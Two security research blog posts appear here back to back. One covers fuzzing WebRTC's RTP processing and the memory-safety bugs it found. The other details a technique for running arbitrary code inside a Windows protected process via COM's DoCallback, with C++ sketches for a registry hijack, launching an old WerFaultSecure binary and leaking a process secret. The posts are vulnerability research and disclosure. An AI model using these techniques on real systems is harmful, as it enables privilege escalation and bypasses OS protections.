Almost all video conferencing solutions have converged on a single architecture. It assumes that two peers can communicate via a secure, integrity checked channel which may have low bandwidth or involve an intermediary server, and it allows them to create a faster, higher-bandwidth peer-to-peer channel.
The first stage in creating a connection is called signalling. It is the process through which the two peers exchange the information they will need to create a connection, including network addresses, supported codecs and cryptographic keys. Usually, the calling peer sends a call request including information about itself to the receiving peer, and then the receiving peer responds with similar information. SDP is a common protocol for exchanging this information, but it is not always used, and most implementations do not conform to the specification. It is common for mobile messaging apps to send this information in a specially formatted message, sent through the same channel text messages are sent. Websites that support video conferencing often use WebSockets to exchange information, or exchange it via HTTPS using the webserver as an intermediary.
Once signalling is complete, the peers find a way to route traffic to each other using the STUN, TURN and ICE protocols. Based on what these protocols determine, the peers can create UDP, UDP-over-STUN and occasionally TCP connections, depending on what is favorable for the network conditions.
Once the connection has been made, the peers communicate using Real-time Transport Protocol. Though this protocol is standardized, most implementations deviate somewhat from the standard. RTP can be encrypted using a protocol called Secure RTP (SRTP), and some implementations also encrypt streams using DTLS. Under the encryption envelope, RTP supports features that allow multiple streams and formats of data to be exchanged simultaneously. Then, based on how RTP classifies the data, it is passed on to other processing, such as video codecs.  Stream Control Transmission Protocol (SCTP) is also sometimes used to exchange small amounts of data (for example a text message on top of a call) during video conferencing, but it is less commonly used than RTP.
Even when it is encrypted, RTP often doesn’t include integrity protection, and if it does, it usually doesn’t discard malformed packets. Instead, it attempts to recover them using strategies such as Forward Error Correction (FEC). Most video conferencing solutions also detect when a channel is noisy or low-bandwidth and attempt to handle the situation in a way that leads to the best audio and video quality, for example, sending fewer frames or changing codecs. Real Time Control Protocol (RTCP) is used to exchange statistics on network quality and coordinate adjusting properties of RTP streams to adapt to network conditions.

WebRTC
WebRTC is an open source project that enables video conferencing. It is by far the most commonly used implementation. Chrome, Safari, Firefox, Facebook Messenger, Signal and many other mobile applications use WebRTC. WebRTC seemed like a good starting point for looking at video conferencing as it is heavily used, open source and reasonably well-documented.

WebRTC Signalling
I started by looking at WebRTC signalling, because it is an attack surface that does not require any user interaction. Protocols like RTP usually start being processed after a user has picked up the video call, but signalling is performed before the user is notified of the call. WebRTC uses SDP for signalling.
I reviewed the WebRTC SDP parser code, but did not find any bugs. I also compiled it so it would accept an SDP file on the commandline and fuzzed it, but I did not find any bugs through fuzzing either. I later discovered that WebRTC signalling is not implemented consistently across browsers anyhow. Chrome uses the main WebRTC implementation, Safari has branched slightly and Firefox uses its own implementation. Most mobile applications that use WebRTC also implement their own signalling in a protocol other than SDP. So it is not likely that a bug in WebRTC signalling would affect a wide variety of targets.
RTP Fuzzing
I then decided to look at how RTP is processed in WebRTC. While RTP is not an interaction-less attack surface because the user usually has to answer the call before RTP traffic is processed, picking up a call is a reasonable action to expect a user to take. I started by looking at the WebRTC source, but it is very large and complex, so I decided fuzzing would be a better approach.
The WebRTC repository contains fuzzers written for OSS-Fuzz for every protocol and codec supported by WebRTC, but they do not simulate the interactions between the various parsers, and do not maintain state between test cases, so it seemed likely that end-to-end fuzzing would provide additional coverage.
Setting up end-to-end fuzzing was fairly time intensive, so to see if it was likely to find many bugs, I altered Chrome to send malformed RTP packets. I changed the srtp_protect function in libsrtp so that it ran the following fuzzer on every packet:
void fuzz(char* buf, int len){
  int q = rand()%10;
  if (q == 7){
    int ind = rand()%len;
    buf[ind] = rand();
  }
  if (q == 5){
    for(int i = 0; i < len; i++)
      buf[i] = rand();
  }
}

RTP fuzzer (fuzzer q)
When this version was used to make a WebRTC call to an unmodified instance of Chrome, it crashed roughly every 30 seconds.
Most of the crashes were due to divide-by-zero exceptions, which I submitted patches for, but there were three interesting crashes. I reproduced them by altering the WebRTC source in Chrome so that it would generate the packets that caused the same crashes, and then set up a standalone build of WebRTC to reproduce them, so that it was not necessary to rebuild Chrome to reproduce the issues.
The first issue, CVE-2018-6130, is an out-of-bounds memory issue related to the use of std::map::find in processing VP9 (a video codec). In the following code, the value tl0_pic_idx is pulled out of an RTP packet unverified (GOF stands for group of frames).
if (frame->frame_type() == kVideoFrameKey) {
    ...
    GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;
    FrameReceivedVp9(frame->id.picture_id, &info);
    UnwrapPictureIds(frame);
    return kHandOff;
}

If this value does not exist in the gof_info_ map, std::map::find returns the end value of the map, which points to one element past the allocated values for the map. Depending on memory layout, dereferencing this iterator will either crash or return the contents of unallocated memory.
The second issue, CVE-2018-6129, is a more typical out-of-bounds read issue, where the index of a field is read out of an RTP packet, and not verified before it is used to index a vector.
The third issue, CVE-2018-6157, is a type confusion issue that occurs when a packet that looks like a VP8 packet is sent to the H264 parser. The packet will eventually be treated like an H264 packet even though it hasn’t gone through the necessary checks for H264. The impact of this issue is also limited to reading out of bounds.
There are a lot of limitations to the approach of fuzzing in a browser. It is very slow, the issues are difficult to reproduce, and it is difficult to fuzz a variety of test cases, because each call needs to be started manually, and certain properties, such as the default codec, can’t change in the middle of the call. After I reported these issues, the WebRTC team suggested that I use the video_replay tool, which can be used to replay RTP streams recorded in a patched browser. The tool was not able to reproduce a lot of my issues because they used non-default WebRTC settings configured through signalling, so I added the ability to load a configuration file alongside the RTP dump to this tool. This made it possible to quickly reproduce vulnerabilities in WebRTC.
This tool also had the benefit of enabling much faster fuzzing, as it was possible to fuzz RTP by fuzzing the RTP dump file and loading it into video_replay. There were some false positives, as it was also possible that fuzzing caused bugs in parsing the RTP dump file format, but most of the bugs were actually in RTP processing.

Fuzzing with the video_replay tool with code coverage and ASAN enabled led to four more bugs. We ran the fuzzer on 50 cores for about two weeks to find these issues.
CVE-2018-6156 is probably the most exploitable bug uncovered. It is a large overflow in FEC. The buffer WebRTC uses to process FEC packets is 1500 bytes, but it does no size checking of these packets once they are extracted from RTP. Practically, they can be up to about 2000 bytes long.
CVE-2018-6155 is a use-after-free in a video codec called VP8. It is interesting because it affects the VP8 library, libvpx, as opposed to code in WebRTC, so it has the potential to affect software that uses this library other than WebRTC. A generic fix for libvpx was released as a result of this bug.
CVE-2018-16071 is a use-after-free in VP9 processing that is somewhat similar to CVE-2018-6130. Once again, an untrusted index is pulled out of a packet, but this time it is used as the upper bounds of a vector erase operation, so it is possible to delete all the elements of the vector before it is used.
CVE-2018-16083 is an out-of-bounds read in FEC that occurs due to a lack of bounds checking.
Overall, end-to-end fuzzing found a lot of bugs in WebRTC, and a few were fairly serious. They have all now been fixed. This shows that end-to-end fuzzing is an effective approach for finding vulnerabilities in this type of video conferencing solution. In Part 2, we will try a similar approach on FaceTime. Stay tuned!

Injecting Code into Windows Protected Processes using COM - Part 2

30 November 2018 - 19:11
Posted by James Forshaw, Project Zero
In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.
As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.
I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.
Path                                     Signing Level
C:\windows\system32\GenValObj.exe        Windows
C:\windows\system32\sppsvc.exe           Windows
C:\windows\system32\WerFaultSecure.exe   WindowsTCB
C:\windows\system32\SgrmBroker.exe       WindowsTCB
As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface; the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.
The SgrmBroker executable doesn’t do very much at all; it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard, and it didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level through hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service, if it could initialize COM perhaps there was something I could abuse to get arbitrary code execution. To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.
The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:
interface IObjectExporter {
    // ...
    error_status_t ResolveOxid(
        [in] handle_t hRpc,
        [in] OXID* pOxid,
        [in] unsigned short cRequestedProtseqs,
        [in] unsigned short arRequestedProtseqs[],
        [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
        [out, ref] IPID* pipidRemUnknown,
        [out, ref] DWORD* pAuthnHint
    );
}
In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.
An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.
The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.

In this example screenshot there are actually two IPIDs exported, IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and look up names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:
[uuid("00000134-0000-0000-c000-000000000046")]interface IRundown : IUnknown {    HRESULT RemQueryInterface(...);    HRESULT RemAddRef(...);    HRESULT RemRelease(...);    HRESULT RemQueryInterface2(...);    HRESULT RemChangeRef(...);    HRESULT DoCallback([in] struct XAptCallback* pCallbackData);    HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);    HRESULT AcknowledgeMarshalingSets(...);    HRESULT GetInterfaceNameFromIPID(...);    HRESULT RundownOid(...);}
This interface is a superset of IRemUnknown: it implements methods such as RemQueryInterface and then adds some additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods; they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):
struct XAptCallback {
  void* pfnCallback;
  void* pParam;
  void* pServerCtx;
  void* pUnk;
  void* iid;
  int   iMethod;
  GUID  guidProcessSecret;
};
HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {
  CProcessSecret::GetProcessSecret(&pguidProcessSecret);
  if (!memcmp(&pguidProcessSecret,
              &pCallbackData->guidProcessSecret, sizeof(GUID))) {
    if (pCallbackData->pServerCtx == GetCurrentContext()) {
      return pCallbackData->pfnCallback(pCallbackData->pParam);
    } else {
      return SwitchForCallback(
                   pCallbackData->pServerCtx,
                   pCallbackData->pfnCallback,
                   pCallbackData->pParam);
    }
  }
  return E_INVALIDARG;
}
This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.
What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important: when calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:
  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns, so the callback runs directly on the RPC thread.
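To make the shape of the call concrete, here is a rough caller-side sketch of how those values would be plugged into DoCallback. The IRundown declaration below only gives DoCallback its real signature (the earlier slots are stubbed purely to preserve the vtable order), the CallIntoProtectedProcess helper is hypothetical, and actually obtaining a usable IRundown proxy from the ALPC port and IPID is not shown, so treat this as an illustration of the data that must be supplied rather than a working client.

// Sketch only: assumes we already hold a marshaled IRundown proxy for the
// target apartment plus the leaked secret and server context pointer.
#include <windows.h>

struct XAptCallback {
  void* pfnCallback;        // Function pointer to invoke in the target.
  void* pParam;             // Single pointer-sized argument.
  void* pServerCtx;         // Must match the target apartment's context.
  void* pUnk;
  void* iid;
  int   iMethod;
  GUID  guidProcessSecret;  // Per-process random secret.
};

// Minimal vtable-compatible declaration; only DoCallback is given its real
// signature, the remaining slots are placeholders to keep the ordering.
struct IRundown : public IUnknown {
  virtual HRESULT STDMETHODCALLTYPE RemQueryInterface() = 0;
  virtual HRESULT STDMETHODCALLTYPE RemAddRef() = 0;
  virtual HRESULT STDMETHODCALLTYPE RemRelease() = 0;
  virtual HRESULT STDMETHODCALLTYPE RemQueryInterface2() = 0;
  virtual HRESULT STDMETHODCALLTYPE RemChangeRef() = 0;
  virtual HRESULT STDMETHODCALLTYPE DoCallback(XAptCallback* pCallbackData) = 0;
  // DoNonreentrantCallback and later methods omitted.
};

HRESULT CallIntoProtectedProcess(IRundown* pRundown, const GUID& leaked_secret,
                                 void* leaked_server_ctx, void* target_fn,
                                 void* target_arg) {
  XAptCallback cb = {};
  cb.pfnCallback = target_fn;        // e.g. address of LoadLibraryW in the target.
  cb.pParam = target_arg;            // e.g. pointer to a DLL path in the target.
  cb.pServerCtx = leaked_server_ctx; // Recovered from the target's memory.
  cb.guidProcessSecret = leaked_secret;
  return pRundown->DoCallback(&cb);
}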

Getting the ALPC port and the IPID is easy if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn't expose a COM object we can create, so that angle isn't open to us, leaving us with a problem to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem: one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?
Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.
First, and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (not even as PPL), so this is possible without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location, as there's likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32-bit version of WerFaultSecure.
Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process's working set once it's modified. As the page isn't locked, it will be eligible for paging if the memory conditions are right. Therefore, if we could force the page containing the secret to be paged to disk, we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:
  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set; this should ensure the modified page containing the secret ends up paged to disk (eventually). A sketch of this step follows the list.
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.
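Of these steps, only the working-set trim in step 2 is simple to show in code. Below is a sketch that asks the memory manager to empty every working set system-wide via NtSetSystemInformation; the information class and command values are undocumented and are the ones generally understood to be used by tools like RAMMap, so treat them as assumptions, and note the crash-dump creation and pagefile-parsing steps are far more involved and aren't shown.

// Sketch of step 2: ask the memory manager to empty every process working set,
// which should push the (unlocked) page holding the secret towards the pagefile.
// NtSetSystemInformation is real but the two constants below are undocumented
// assumptions, taken from values commonly reported for tools such as RAMMap.
#include <windows.h>
#include <winternl.h>

const int SystemMemoryListInformation = 80;  // SYSTEM_INFORMATION_CLASS (assumed value)
const int MemoryEmptyWorkingSets = 2;        // SYSTEM_MEMORY_LIST_COMMAND (assumed value)

typedef NTSTATUS (NTAPI *NtSetSystemInformation_t)(int SystemInformationClass,
                                                   PVOID SystemInformation,
                                                   ULONG SystemInformationLength);

bool EmptyAllWorkingSets() {
  auto pNtSetSystemInformation = (NtSetSystemInformation_t)GetProcAddress(
      GetModuleHandleW(L"ntdll.dll"), "NtSetSystemInformation");
  if (!pNtSetSystemInformation)
    return false;
  // Requires an elevated token, but the attack assumed administrator access anyway.
  int command = MemoryEmptyWorkingSets;
  return pNtSetSystemInformation(SystemMemoryListInformation,
                                 &command, sizeof(command)) >= 0;
}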

After coming up with this attack, it seemed far too much like hard work, and it needed administrator privileges, which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

Up to this point I've been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I've not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can't we just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?
The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.
However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.
There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website (link), extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It's unclear, but due to the way PP is secured, all the trust is based on the signed executable. As the signature of the executable is still valid, the OS just trusts that it can be run at the requested protection level. Presumably there must be some way for Microsoft to block specific executables, although at least they can't just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they're designed to run on? After all, Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks that bypass WinRT UMCI signing, so generalizing might make some sense, especially for certain PP levels.
After a little bit of RE and reference to Alex's presentation, I was able to work out the various parameters that needed to be passed to the WerFaultSecure process to perform a dump of a PP:
Parameter          Description
/h                 Enable secure dump mode.
/pid {pid}         Specify the Process ID to dump.
/tid {tid}         Specify the Thread ID in the process to dump.
/file {handle}     Specify a handle to a writable file for the unencrypted crash dump.
/encfile {handle}  Specify a handle to a writable file for the encrypted crash dump.
/cancel {handle}   Specify a handle to an event to indicate the dump should be cancelled.
/type {flags}      Specify MINIDUMP_TYPE flags for the call to MiniDumpWriteDump.
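To give an idea of how these parameters are consumed, below is a rough sketch of spawning WerFaultSecure at a protected level with an inheritable dump-file handle passed on the command line. PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL combined with CREATE_PROTECTED_PROCESS is the documented route for requesting a protection level at process creation, but the protection constant, the /type value and the argument set here are simplified placeholders (for example /encfile and /cancel are omitted), so treat this as an outline rather than the exact invocation.

// Sketch: launch WerFaultSecure in secure dump mode against a target PID,
// handing it an inheritable file handle for the dump. Requires a Windows 8.1+
// SDK for the protection-level attribute.
#include <windows.h>
#include <stdio.h>

bool DumpWithWerFaultSecure(DWORD target_pid, DWORD target_tid,
                            const wchar_t* wer_path, const wchar_t* dump_path) {
  // The handle is made inheritable so the numeric value placed on the command
  // line is valid inside the child process.
  SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE };
  HANDLE dump_file = CreateFileW(dump_path, GENERIC_WRITE, 0, &sa,
                                 CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  if (dump_file == INVALID_HANDLE_VALUE)
    return false;

  // Request a protected process via the documented protection-level attribute.
  SIZE_T attr_size = 0;
  InitializeProcThreadAttributeList(NULL, 1, 0, &attr_size);
  auto attrs = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attr_size);
  InitializeProcThreadAttributeList(attrs, 1, 0, &attr_size);
  // Placeholder level: the attack actually needs the full PP-WindowsTCB level.
  DWORD protection = PROTECTION_LEVEL_WINTCB_LIGHT;
  UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
                            &protection, sizeof(protection), NULL, NULL);

  wchar_t cmdline[512];
  // /type 2 corresponds to MiniDumpWithFullMemory.
  swprintf_s(cmdline, 512, L"\"%s\" /h /pid %u /tid %u /file %llu /type 2",
             wer_path, target_pid, target_tid,
             (unsigned long long)(ULONG_PTR)dump_file);

  STARTUPINFOEXW si = {};
  si.StartupInfo.cb = sizeof(si);
  si.lpAttributeList = attrs;
  PROCESS_INFORMATION pi = {};
  BOOL ok = CreateProcessW(wer_path, cmdline, NULL, NULL, TRUE /* inherit handles */,
                           CREATE_PROTECTED_PROCESS | EXTENDED_STARTUPINFO_PRESENT,
                           NULL, NULL, &si.StartupInfo, &pi);
  DeleteProcThreadAttributeList(attrs);
  HeapFree(GetProcessHeap(), 0, attrs);
  CloseHandle(dump_file);
  if (ok) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }
  return ok != FALSE;
}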
This gives us everything we need to complete the exploit. We don't need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need, including the ALPC port and IPID needed to communicate. We don't need to write our own crash dump parser, as the Debug Engine API which comes installed with Windows can be used. Once we've extracted all the information we need, we can call DoCallback and invoke arbitrary code.

Putting it All Together

There are still two things we need to complete the exploit: how to get WerFaultSecure to start up COM, and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.
Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.
Unfortunately I’ve not been entirely truthful during my description of how COM remoting is setup. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to setup remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.

Unfortunately, looking at the code, this won't work; a cut-down version is shown below:
HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {
  CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
  IOSTaskCompletion* inf;
  HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,
      NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));
  if (SUCCEEDED(hr)) {
    // Open process and disable PLM handling.
  }
}
The code passes the flag CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class, the COM runtime would just ignore it. Fortunately there's another way: the code initializes the current thread's COM apartment as an STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object, its threading model is set to “Both”. What this means in practice is that the object supports being called directly from either an STA or an MTA.
However, if the threading model were instead set to “Free”, then the object would only support direct calls from an MTA, which means the COM runtime would have to enable remoting, create the object in an MTA (using something similar to DoCallback), then marshal calls to that object from the original apartment. Once COM starts remoting, it initializes all remote features, including IRundown. As we can hijack the server registration, we can just change the threading model; this will cause WerFaultSecure to start COM remoting, which we can now exploit.
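A sketch of what that registration hijack might look like is below. It writes an InprocServer32 key for the CLSID under HKEY_CURRENT_USER\Software\Classes and sets ThreadingModel to "Free"; the server DLL path is a placeholder argument, and in practice you'd copy it from the original HKLM registration so the class still functions.

// Sketch: hijack the per-user COM registration for the class loaded by
// CCrashReport::ExemptFromPlmHandling and force its ThreadingModel to "Free".
#include <windows.h>
#include <string.h>

bool HijackClassRegistration(const wchar_t* server_dll_path /* placeholder path */) {
  const wchar_t* key_path =
      L"Software\\Classes\\CLSID\\{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}\\InprocServer32";
  HKEY key = NULL;
  if (RegCreateKeyExW(HKEY_CURRENT_USER, key_path, 0, NULL, 0,
                      KEY_WRITE, NULL, &key, NULL) != ERROR_SUCCESS)
    return false;

  // Default value: path to the COM server DLL (copy this from the original
  // HKLM registration so the object still works).
  RegSetValueExW(key, NULL, 0, REG_SZ, (const BYTE*)server_dll_path,
                 (DWORD)((wcslen(server_dll_path) + 1) * sizeof(wchar_t)));

  // Switching the threading model from "Both" to "Free" forces the STA caller
  // through the MTA, which initializes COM remoting (and therefore IRundown).
  const wchar_t* model = L"Free";
  RegSetValueExW(key, L"ThreadingModel", 0, REG_SZ, (const BYTE*)model,
                 (DWORD)((wcslen(model) + 1) * sizeof(wchar_t)));
  RegCloseKey(key);
  return true;
}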
What about the second part: what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria to avoid undefined behavior:
  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the return value are available (as the HRESULT), if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?
Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.
